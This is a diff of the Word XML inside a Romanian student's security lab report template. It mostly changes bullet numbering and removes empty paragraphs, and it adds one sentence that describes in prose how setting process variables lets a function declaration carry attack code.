+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -2409,6 +4157,15 @@
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
+++ b/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
@@ -1787,7 +1787,9 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
         <w:drawing>
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
             <wp:simplePos x="0" y="0"/>
@@ -1833,59 +1835,6 @@
             </a:graphic>
           </wp:anchor>
         </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
       </w:r>
     </w:p>
     <w:p>

--- a/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
+++ b/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
@@ -2240,6 +2240,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
         <w:rPr>
           <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
         </w:rPr>
@@ -2337,508 +2341,19 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
-        </w:rPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>astfel, având puterea de aseta niște variabile noi pentru proces, putem sa includem o declarare de funcție urmata de codul de atac prin care putem obtine acces la resursele dorite</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2914,6 +2429,416 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
